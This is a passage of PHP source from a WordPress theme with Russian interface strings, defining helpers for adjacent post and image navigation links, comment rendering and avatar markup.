		return theme_get_adjacent_post_link($format, $link, $in_same_cat, $excluded_categories, false);
	}
}

if (!function_exists('theme_get_adjacent_image_link')){
	function theme_get_adjacent_image_link($prev = true, $size = 'thumbnail', $text = false) {
		global $post;
		$post = get_post($post);
		$attachments = array_values(get_children( array('post_parent' => $post->post_parent, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID') ));

		foreach ( $attachments as $k => $attachment )
			if ( $attachment->ID == $post->ID )
				break;

		$k = $prev ? $k - 1 : $k + 1;

		if ( isset($attachments[$k]) )
			return wp_get_attachment_link($attachments[$k]->ID, $size, true, false, $text);
	}
}

if (!function_exists('theme_get_previous_image_link')){
	function theme_get_previous_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(true, $size, $text);
		if ($result) $result = '&laquo; ' . $result;
		return $result;
	}
}
	
if (!function_exists('theme_get_next_image_link')){
	function theme_get_next_image_link($size = 'thumbnail', $text = false) {
		$result = theme_get_adjacent_image_link(false, $size, $text);
		if ($result) $result .= ' &raquo;';
		return $result;
	}
}

if (!function_exists('theme_get_adjacent_post_link')){
	function theme_get_adjacent_post_link($format, $link, $in_same_cat = false, $excluded_categories = '', $previous = true) {
		if ( $previous && is_attachment() )
			$post = & get_post($GLOBALS['post']->post_parent);
		else
			$post = get_adjacent_post($in_same_cat, $excluded_categories, $previous);

		if ( !$post )
			return;

		$title = $post->post_title;

		if ( empty($post->post_title) )
			$title = $previous ? __('Предыдущие записи', THEME_NS) : __('Следующие записи', THEME_NS);

		$title = apply_filters('the_title', $title, $post->ID);
		$short_title = $title;
		if (theme_get_option('theme_single_navigation_trim_title')) {
			$short_title = theme_trim_long_str($title, theme_get_option('theme_single_navigation_trim_len'));
		}
		$date = mysql2date(get_option('date_format'), $post->post_date);
		$rel = $previous ? 'prev' : 'next';

		$string = '<a href="'.get_permalink($post).'" title="'.esc_attr($title).'" rel="'.$rel.'">';
		$link = str_replace('%title', $short_title, $link);
		$link = str_replace('%date', $date, $link);
		$link = $string . $link . '</a>';

		$format = str_replace('%link', $link, $format);

		$adjacent = $previous ? 'previous' : 'next';
		return apply_filters( "{$adjacent}_post_link", $format, $link );
	}
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('theme_comment')){
	function theme_comment( $comment, $args, $depth ) {
		$GLOBALS['comment'] = $comment;
		
		
		switch ( $comment->comment_type ) :
		
			case '' :
		?>
		<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
			<?php ob_start(); ?>
			<div class="comment-author vcard">
				<?php echo theme_get_avatar(array('id' => $comment, 'size' => 48)); ?>
				<?php printf( __( '%s <span class="says">сказал:</span>', THEME_NS ), sprintf( '<cite class="fn">%s</cite>', get_comment_author_link() ) ); ?>
			</div>
			<?php if ( $comment->comment_approved == '0' ) : ?>
				<em><?php _e( 'Ваш комментарий ожидает модерации.', THEME_NS); ?></em>
				<br />
			<?php endif; ?>

			<div class="comment-meta commentmetadata"><a href="<?php echo esc_url( get_comment_link( $comment->comment_ID ) ); ?>">
				<?php
					printf( __( '%1$s - %2$s', THEME_NS ), get_comment_date(),  get_comment_time() ); ?></a><?php edit_comment_link( __( '(Редактировать)', THEME_NS), ' ' );
				?>
			</div>

			<div class="comment-body"><?php comment_text(); ?></div>

			<div class="reply">
				<?php comment_reply_link( array_merge( $args, array( 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
			</div>
			<?php theme_post_wrapper(array('content' => ob_get_clean(), 'id' => 'comment-'.get_comment_ID())); ?>


		<?php
				break;
			case 'pingback'  :
			case 'trackback' :
		?>
		<li class="post pingback">
		<?php ob_start(); ?>
			<p><?php _e( 'Ссылка:', THEME_NS ); ?> <?php comment_author_link(); ?><?php edit_comment_link( __('(Редактировать)', THEME_NS), ' ' ); ?></p>
		<?php theme_post_wrapper(array('content' => ob_get_clean(), 'class' => $comment->comment_type));
				break;
		endswitch;
	}
}

if (!function_exists('theme_get_avatar')){
	function theme_get_avatar($args = ''){
	$args = wp_parse_args($args, array('id' => false, 'size' => 96, 'default' => '', 'alt' => false, 'url' => false));
	extract($args);
		$result = get_avatar($id, $size, $default, $alt);
		if ($result) {
			if ($url){
				$result = '<a href="'.esc_url($url).'">' . $result . '</a>';
			}
			$result = '<div class="avatar">' . $result . '</div>';
		}
		return $result;
	}
}

if (!function_exists('get_post_format')){
	function get_post_format(){
		return false;
	}
}